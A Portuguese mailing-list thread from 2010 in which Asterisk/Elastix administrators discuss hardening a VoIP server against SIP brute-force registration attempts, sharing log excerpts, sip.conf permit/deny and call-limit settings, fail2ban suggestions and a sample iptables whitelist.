Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Olá bom dia ! Obrigado amigo pela consideração, contudo sobre a sua ultima dúvida tem como limitar pro tuonco (que vc já o fez) e por ramais, a configuração é feita nos ramais e se chama CALL-LIMIT=1. No link tem mais informações = http://forums.digium.com/viewtopic.php?p=12157 Estamos ai para oque precisar. Lembrando que este é o assunto mais sério que devemos tratar entre nós, peço a participação de todos. Obrigado mais uma vez. Em 23 de novembro de 2010 08:23, Gleidison Sampaio gleidison.samp...@hotmail.com escreveu: Bom dia Lista! Bom primeiramente quero agradecer a ajuda que o Nielsen e o Alejandro me deram, e aproveitar pra postar o que eu fiz no servidor o que eu tomei de providencias em cima das dicas e recomendações que os nobres colegas me deram. 1 - Como eu tinha mais IP Publico disponível, mudei o IP do Asterisk; 2 - Como nas filiais são IP Fixo, eu usei o parâmetro permit e deny conforme recomendação do Nielsen; 3- Coloquei uma senha FORTE para cada ramal; incluindo letras, números e caracteres; 4- Como a Operadora de VoIP é nossa mesmo e eu tenho a Administração, mudei também o plano de discagem para ligaçoes internacionais, ou seja nao é o plano padrao de discar 00 + Codigo do Pais + Numero de telefone; 5- A quinta providencia ainda nao consegui realizar, que é limitar para apenas uma ligação por ramal, o que estou montando é um Trunk SIP para cada Filial e limitando no Trunk no parametro Maximum Channelshttps://189.58.111.243/config.php?display=trunksextdisplay=OUT_2 para apenas 2 chamadas simultâneas. visto que nossa operadora permite infinitas chamadas simultâneas em um mesmo tronco. Sendo assim que sirva de alerta para os caros colegas, se possivel preciso só de mais uma ajuda de limitar as chamadas por ramais. Att; *Gleidison C. Sampaio* -- From: niel...@freesolutions.com.br Date: Mon, 22 Nov 2010 17:24:43 -0300 To: asteriskbrasil@listas.asteriskbrasil.org Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Depois da senha estes procedimentos que o amigo postou ai (nível de rede) são os mais críticos e elimina mais de 90% dos problemas de segurança, de resto só fica a confiança no código do asterisk (nível de aplicação). =D Em 22 de novembro de 2010 17:03, Rodrigo Vian lis...@porttaltecnologia.com.br escreveu: seus ramais possuem ip fixo podes utilizar os parâmetros: deny=0.0.0.0/0.0.0.0 permit=222.111.222.1/255.255.255.255 Com esses parâmetros você somente vai permitir login a partir do ip especificado... Se tiver controle de firewall, pode utilizar fail2ban... Abs Mensagem original *De*: Gleidison Sampaio gleidison.samp...@hotmail.comgleidison+sampaio+%3cgleidison.samp...@hotmail.com%3e *Responder a*: asteriskbrasil@listas.asteriskbrasil.org *Para*: alejandrorflo...@gmail.com *Cc*: Asterisk Lista asteriskbrasil@listas.asteriskbrasil.orgasterisk+lista+%3casteriskbra...@listas.asteriskbrasil.org%3e *Assunto*: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 *Data*: Mon, 22 Nov 2010 15:49:04 -0400 Para minha Surpresa tem um IP dos EUA, mais tem um arquivo de log de mais de 40 mb só com essa mensagem. caso alguem tenha alguma dica, alem de reforçar a senha, que ja criei uma que EU nunca vou decorar essa senha, com caracteres, letras, numeros, maiusculas e minusculas, porem uma dica para aumentar mais a segurança vai bem, e pra garantir tbem estou subindo essa maquina em outro IP com uma faixa bem diferente. [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found Att; *Gleidison C. Sampaio* Date: Mon, 22 Nov 2010 16:33:22 -0300 Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 From: alejandrorflo...@gmail.com To: gleidison.samp...@hotmail.com CC: asteriskbrasil@listas.asteriskbrasil.org Opa, Alejandro, Na verdade nao sou la aqueles especialistas, poderia me dizer onde verifico o log dos ramais, tipo o IP Publico que cada ramal se logou. Os logs do asterisk ficam em: /var/log/asterisk/full Verifica nesse arquivo. Outra coisa é via console do asterisk executar o comando: sip show
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Nielsen, Só uma duvida, eu devo acrescentar o contexto abaixo no SIP.CONF? ; call-limit=1 ; permit only 1 outgoing call and 1 incoming call at a time; from the phone to asterisk; (1 for the explicit peer, 1 for the explicit user,; remember that a friend equals 1 peer and 1 user in; memory) From: niel...@freesolutions.com.br Date: Tue, 23 Nov 2010 08:36:28 -0300 To: asteriskbrasil@listas.asteriskbrasil.org Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Olá bom dia ! Obrigado amigo pela consideração, contudo sobre a sua ultima dúvida tem como limitar pro tuonco (que vc já o fez) e por ramais, a configuração é feita nos ramais e se chama CALL-LIMIT=1. No link tem mais informações = http://forums.digium.com/viewtopic.php?p=12157 Estamos ai para oque precisar. Lembrando que este é o assunto mais sério que devemos tratar entre nós, peço a participação de todos. Obrigado mais uma vez. Em 23 de novembro de 2010 08:23, Gleidison Sampaio gleidison.samp...@hotmail.com escreveu: Bom dia Lista! Bom primeiramente quero agradecer a ajuda que o Nielsen e o Alejandro me deram, e aproveitar pra postar o que eu fiz no servidor o que eu tomei de providencias em cima das dicas e recomendações que os nobres colegas me deram. 1 - Como eu tinha mais IP Publico disponível, mudei o IP do Asterisk; 2 - Como nas filiais são IP Fixo, eu usei o parâmetro permit e deny conforme recomendação do Nielsen; 3- Coloquei uma senha FORTE para cada ramal; incluindo letras, números e caracteres; 4- Como a Operadora de VoIP é nossa mesmo e eu tenho a Administração, mudei também o plano de discagem para ligaçoes internacionais, ou seja nao é o plano padrao de discar 00 + Codigo do Pais + Numero de telefone; 5- A quinta providencia ainda nao consegui realizar, que é limitar para apenas uma ligação por ramal, o que estou montando é um Trunk SIP para cada Filial e limitando no Trunk no parametro Maximum Channels para apenas 2 chamadas simultâneas. visto que nossa operadora permite infinitas chamadas simultâneas em um mesmo tronco. Sendo assim que sirva de alerta para os caros colegas, se possivel preciso só de mais uma ajuda de limitar as chamadas por ramais. Att; Gleidison C. Sampaio From: niel...@freesolutions.com.br Date: Mon, 22 Nov 2010 17:24:43 -0300 To: asteriskbrasil@listas.asteriskbrasil.org Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Depois da senha estes procedimentos que o amigo postou ai (nível de rede) são os mais críticos e elimina mais de 90% dos problemas de segurança, de resto só fica a confiança no código do asterisk (nível de aplicação). =D Em 22 de novembro de 2010 17:03, Rodrigo Vian lis...@porttaltecnologia.com.br escreveu: seus ramais possuem ip fixo podes utilizar os parâmetros: deny=0.0.0.0/0.0.0.0 permit=222.111.222.1/255.255.255.255 Com esses parâmetros você somente vai permitir login a partir do ip especificado... Se tiver controle de firewall, pode utilizar fail2ban... Abs Mensagem original De: Gleidison Sampaio gleidison.samp...@hotmail.com Responder a: asteriskbrasil@listas.asteriskbrasil.org Para: alejandrorflo...@gmail.com Cc: Asterisk Lista asteriskbrasil@listas.asteriskbrasil.org Assunto: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Data: Mon, 22 Nov 2010 15:49:04 -0400 Para minha Surpresa tem um IP dos EUA, mais tem um arquivo de log de mais de 40 mb só com essa mensagem. caso alguem tenha alguma dica, alem de reforçar a senha, que ja criei uma que EU nunca vou decorar essa senha, com caracteres, letras, numeros, maiusculas e minusculas, porem uma dica para aumentar mais a segurança vai bem, e pra garantir tbem estou subindo essa maquina em outro IP com uma faixa bem diferente. [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found Att; Gleidison C. Sampaio Date: Mon, 22 Nov 2010 16:33:22 -0300 Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 From: alejandrorflo...@gmail.com To: gleidison.samp...@hotmail.com
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Gleidison, A caracteristica deste log indica que o ataque sofrido foi do tipo força bruta, como mencionei na lista técnica se possivel tente alterar a porta padrão 5060, isso é claro requer que todos os seus peers sejam reprogramados porém obtive bons resultados com esta alteração em meu ambiente. Att Wagner Penha - Original Message - From: Gleidison Sampaio To: alejandrorflo...@gmail.com Cc: Asterisk Lista Sent: Monday, November 22, 2010 5:49 PM Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Para minha Surpresa tem um IP dos EUA, mais tem um arquivo de log de mais de 40 mb só com essa mensagem. caso alguem tenha alguma dica, alem de reforçar a senha, que ja criei uma que EU nunca vou decorar essa senha, com caracteres, letras, numeros, maiusculas e minusculas, porem uma dica para aumentar mais a segurança vai bem, e pra garantir tbem estou subindo essa maquina em outro IP com uma faixa bem diferente. [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found Att; Gleidison C. Sampaio Date: Mon, 22 Nov 2010 16:33:22 -0300 Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 From: alejandrorflo...@gmail.com To: gleidison.samp...@hotmail.com CC: asteriskbrasil@listas.asteriskbrasil.org Opa, Alejandro, Na verdade nao sou la aqueles especialistas, poderia me dizer onde verifico o log dos ramais, tipo o IP Publico que cada ramal se logou. Os logs do asterisk ficam em: /var/log/asterisk/full Verifica nesse arquivo. Outra coisa é via console do asterisk executar o comando: sip show peers que vai te mostrar que ramais estão online e qual ip de origem. -- Abraço, Alejandro Flores http://www.triforsec.com.br/ -- ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org -- No virus found in this incoming message. Checked by AVG - www.avg.com Version: 8.5.449 / Virus Database: 271.1.1/3271 - Release Date: 11/21/10 19:35:00 -- Estou utilizando a versão gratuita de SPAMfighter para usuários privados. Foi removido 3367 emails de spam até hoje. Os usuários pagantes não têm esta mensagem nos seus emails. Adquira SPAMfighter grátis aqui: http://www.spamfighter.com/lpt ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Mais uma dica muito boa do colaborador Wagner, alterar a porta padrão, pois todos os SCRIPTS MALICIOSOS estão orientados as portas padrões. Sobre a call-limit=NUMERO DE LIGAÇÕES esta configuração fica no arquivo sip.conf em [general] call-limit=3 (numero de ligações simultaneas que é permitida pelo ramal) OU SETAR INDIVIDUAL POR CADA RAMAL(EXTENSION) =] VEJA MAIS ABAIXO http://www.voip-info.org/wiki/view/Asterisk+config+sip.conf Vlw. Em 23 de novembro de 2010 09:41, Wagner wag...@beetelecom.com.br escreveu: Gleidison, A caracteristica deste log indica que o ataque sofrido foi do tipo força bruta, como mencionei na lista técnica se possivel tente alterar a porta padrão 5060, isso é claro requer que todos os seus peers sejam reprogramados porém obtive bons resultados com esta alteração em meu ambiente. Att Wagner Penha - Original Message - *From:* Gleidison Sampaio gleidison.samp...@hotmail.com *To:* alejandrorflo...@gmail.com *Cc:* Asterisk Lista asteriskbrasil@listas.asteriskbrasil.org *Sent:* Monday, November 22, 2010 5:49 PM *Subject:* Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Para minha Surpresa tem um IP dos EUA, mais tem um arquivo de log de mais de 40 mb só com essa mensagem. caso alguem tenha alguma dica, alem de reforçar a senha, que ja criei uma que EU nunca vou decorar essa senha, com caracteres, letras, numeros, maiusculas e minusculas, porem uma dica para aumentar mais a segurança vai bem, e pra garantir tbem estou subindo essa maquina em outro IP com uma faixa bem diferente. [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found Att; *Gleidison C. Sampaio* Date: Mon, 22 Nov 2010 16:33:22 -0300 Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 From: alejandrorflo...@gmail.com To: gleidison.samp...@hotmail.com CC: asteriskbrasil@listas.asteriskbrasil.org Opa, Alejandro, Na verdade nao sou la aqueles especialistas, poderia me dizer onde verifico o log dos ramais, tipo o IP Publico que cada ramal se logou. Os logs do asterisk ficam em: /var/log/asterisk/full Verifica nesse arquivo. Outra coisa é via console do asterisk executar o comando: sip show peers que vai te mostrar que ramais estão online e qual ip de origem. -- Abraço, Alejandro Flores http://www.triforsec.com.br/ -- ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org -- No virus found in this incoming message. Checked by AVG - www.avg.com Version: 8.5.449 / Virus Database: 271.1.1/3271 - Release Date: 11/21/10 19:35:00 -- Estou utilizando a versão gratuita de SPAMfighter para usuários privados. Foi removido 3367 emails de spam até hoje. Experimente SPAMfighter http://www.spamfighter.com/lpt de graça agora! Computador lento? Melhore o seu computador lentohttp://www.spamfighter.com/SLOW-PCfighter/Lang_PT/?cid=SIGPT ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Num rola de implementar um fail2ban no elastix?? -- Gian Nicodemus Analista de sistemas giannicode...@gmail.com Em 23 de novembro de 2010 13:56, Nielsen Alves de Oliveira niel...@freesolutions.com.br escreveu: Mais uma dica muito boa do colaborador Wagner, alterar a porta padrão, pois todos os SCRIPTS MALICIOSOS estão orientados as portas padrões. Sobre a call-limit=NUMERO DE LIGAÇÕES esta configuração fica no arquivo sip.conf em [general] call-limit=3 (numero de ligações simultaneas que é permitida pelo ramal) OU SETAR INDIVIDUAL POR CADA RAMAL(EXTENSION) =] VEJA MAIS ABAIXO http://www.voip-info.org/wiki/view/Asterisk+config+sip.conf Vlw. Em 23 de novembro de 2010 09:41, Wagner wag...@beetelecom.com.brescreveu: Gleidison, A caracteristica deste log indica que o ataque sofrido foi do tipo força bruta, como mencionei na lista técnica se possivel tente alterar a porta padrão 5060, isso é claro requer que todos os seus peers sejam reprogramados porém obtive bons resultados com esta alteração em meu ambiente. Att Wagner Penha - Original Message - *From:* Gleidison Sampaio gleidison.samp...@hotmail.com *To:* alejandrorflo...@gmail.com *Cc:* Asterisk Lista asteriskbrasil@listas.asteriskbrasil.org *Sent:* Monday, November 22, 2010 5:49 PM *Subject:* Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Para minha Surpresa tem um IP dos EUA, mais tem um arquivo de log de mais de 40 mb só com essa mensagem. caso alguem tenha alguma dica, alem de reforçar a senha, que ja criei uma que EU nunca vou decorar essa senha, com caracteres, letras, numeros, maiusculas e minusculas, porem uma dica para aumentar mais a segurança vai bem, e pra garantir tbem estou subindo essa maquina em outro IP com uma faixa bem diferente. [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found Att; *Gleidison C. Sampaio* Date: Mon, 22 Nov 2010 16:33:22 -0300 Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 From: alejandrorflo...@gmail.com To: gleidison.samp...@hotmail.com CC: asteriskbrasil@listas.asteriskbrasil.org Opa, Alejandro, Na verdade nao sou la aqueles especialistas, poderia me dizer onde verifico o log dos ramais, tipo o IP Publico que cada ramal se logou. Os logs do asterisk ficam em: /var/log/asterisk/full Verifica nesse arquivo. Outra coisa é via console do asterisk executar o comando: sip show peers que vai te mostrar que ramais estão online e qual ip de origem. -- Abraço, Alejandro Flores http://www.triforsec.com.br/ -- ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org -- No virus found in this incoming message. Checked by AVG - www.avg.com Version: 8.5.449 / Virus Database: 271.1.1/3271 - Release Date: 11/21/10 19:35:00 -- Estou utilizando a versão gratuita de SPAMfighter para usuários privados. Foi removido 3367 emails de spam até hoje. Experimente SPAMfighter http://www.spamfighter.com/lpt de graça agora! Computador lento? Melhore o seu computador lentohttp://www.spamfighter.com/SLOW-PCfighter/Lang_PT/?cid=SIGPT ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Concerteza ROLA ! Desde que sempre audite os bans ! =D Em 23 de novembro de 2010 13:12, Gian Nicodemus giannicode...@gmail.comescreveu: Num rola de implementar um fail2ban no elastix?? -- Gian Nicodemus Analista de sistemas giannicode...@gmail.com Em 23 de novembro de 2010 13:56, Nielsen Alves de Oliveira niel...@freesolutions.com.br escreveu: Mais uma dica muito boa do colaborador Wagner, alterar a porta padrão, pois todos os SCRIPTS MALICIOSOS estão orientados as portas padrões. Sobre a call-limit=NUMERO DE LIGAÇÕES esta configuração fica no arquivo sip.conf em [general] call-limit=3 (numero de ligações simultaneas que é permitida pelo ramal) OU SETAR INDIVIDUAL POR CADA RAMAL(EXTENSION) =] VEJA MAIS ABAIXO http://www.voip-info.org/wiki/view/Asterisk+config+sip.conf Vlw. Em 23 de novembro de 2010 09:41, Wagner wag...@beetelecom.com.brescreveu: Gleidison, A caracteristica deste log indica que o ataque sofrido foi do tipo força bruta, como mencionei na lista técnica se possivel tente alterar a porta padrão 5060, isso é claro requer que todos os seus peers sejam reprogramados porém obtive bons resultados com esta alteração em meu ambiente. Att Wagner Penha - Original Message - *From:* Gleidison Sampaio gleidison.samp...@hotmail.com *To:* alejandrorflo...@gmail.com *Cc:* Asterisk Lista asteriskbrasil@listas.asteriskbrasil.org *Sent:* Monday, November 22, 2010 5:49 PM *Subject:* Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Para minha Surpresa tem um IP dos EUA, mais tem um arquivo de log de mais de 40 mb só com essa mensagem. caso alguem tenha alguma dica, alem de reforçar a senha, que ja criei uma que EU nunca vou decorar essa senha, com caracteres, letras, numeros, maiusculas e minusculas, porem uma dica para aumentar mais a segurança vai bem, e pra garantir tbem estou subindo essa maquina em outro IP com uma faixa bem diferente. [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found Att; *Gleidison C. Sampaio* Date: Mon, 22 Nov 2010 16:33:22 -0300 Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 From: alejandrorflo...@gmail.com To: gleidison.samp...@hotmail.com CC: asteriskbrasil@listas.asteriskbrasil.org Opa, Alejandro, Na verdade nao sou la aqueles especialistas, poderia me dizer onde verifico o log dos ramais, tipo o IP Publico que cada ramal se logou. Os logs do asterisk ficam em: /var/log/asterisk/full Verifica nesse arquivo. Outra coisa é via console do asterisk executar o comando: sip show peers que vai te mostrar que ramais estão online e qual ip de origem. -- Abraço, Alejandro Flores http://www.triforsec.com.br/ -- ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org -- No virus found in this incoming message. Checked by AVG - www.avg.com Version: 8.5.449 / Virus Database: 271.1.1/3271 - Release Date: 11/21/10 19:35:00 -- Estou utilizando a versão gratuita de SPAMfighter para usuários privados. Foi removido 3367 emails de spam até hoje. Experimente SPAMfighter http://www.spamfighter.com/lpt de graça agora! Computador lento? Melhore o seu computador lentohttp://www.spamfighter.com/SLOW-PCfighter/Lang_PT/?cid=SIGPT
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Usa o iptables tmb exemplo abaixo #ip publico do asterisk IP=200.x.x.x #ips da filial FILIAL1=189.x.x.x FILIAL2=188.x.x.x FILIAL3=187.x.x.x FILIAL4=186.x.x.x iptables -A INPUT -s $FILIAL1 -d $IP -p all --dport 5060 -j ACCEPT iptables -A OUTPUT -d $FILIAL1 -s $IP -p all --sport 5060 -j ACCEPT iptables -A INPUT -s $FILIAL2 -d $IP -p all --dport 5060 -j ACCEPT iptables -A OUTPUT -d $FILIAL2 -s $IP -p all --sport 5060 -j ACCEPT iptables -A INPUT -s $FILIAL3 -d $IP -p all --dport 5060 -j ACCEPT iptables -A OUTPUT -d $FILIAL3 -s $IP -p all --sport 5060 -j ACCEPT iptables -A INPUT -s $FILIAL4 -d $IP -p all --dport 5060 -j ACCEPT iptables -A OUTPUT -d $FILIAL4 -s $IP -p all --sport 5060 -j ACCEPT iptables -A INPUT -s 0/0 -d $IP -p all --dport 5060 -j DROP iptables -A OUTPUT -d 0/0 -s $IP -p all --sport 5060 -j DROP Gian Nicodemus wrote: Num rola de implementar um fail2ban no elastix?? -- Gian Nicodemus Analista de sistemas giannicode...@gmail.com mailto:giannicode...@gmail.com Em 23 de novembro de 2010 13:56, Nielsen Alves de Oliveira niel...@freesolutions.com.br mailto:niel...@freesolutions.com.br escreveu: Mais uma dica muito boa do colaborador Wagner, alterar a porta padrão, pois todos os SCRIPTS MALICIOSOS estão orientados as portas padrões. Sobre a call-limit=NUMERO DE LIGAÇÕES esta configuração fica no arquivo sip.conf em [general] call-limit=3 (numero de ligações simultaneas que é permitida pelo ramal) OU SETAR INDIVIDUAL POR CADA RAMAL(EXTENSION) =] VEJA MAIS ABAIXO http://www.voip-info.org/wiki/view/Asterisk+config+sip.conf Vlw. Em 23 de novembro de 2010 09:41, Wagner wag...@beetelecom.com.br mailto:wag...@beetelecom.com.br escreveu: Gleidison, A caracteristica deste log indica que o ataque sofrido foi do tipo força bruta, como mencionei na lista técnica se possivel tente alterar a porta padrão 5060, isso é claro requer que todos os seus peers sejam reprogramados porém obtive bons resultados com esta alteração em meu ambiente. Att Wagner Penha - Original Message - *From:* Gleidison Sampaio mailto:gleidison.samp...@hotmail.com *To:* alejandrorflo...@gmail.com mailto:alejandrorflo...@gmail.com *Cc:* Asterisk Lista mailto:asteriskbrasil@listas.asteriskbrasil.org *Sent:* Monday, November 22, 2010 5:49 PM *Subject:* Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Para minha Surpresa tem um IP dos EUA, mais tem um arquivo de log de mais de 40 mb só com essa mensagem. caso alguem tenha alguma dica, alem de reforçar a senha, que ja criei uma que EU nunca vou decorar essa senha, com caracteres, letras, numeros, maiusculas e minusculas, porem uma dica para aumentar mais a segurança vai bem, e pra garantir tbem estou subindo essa maquina em outro IP com uma faixa bem diferente. [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 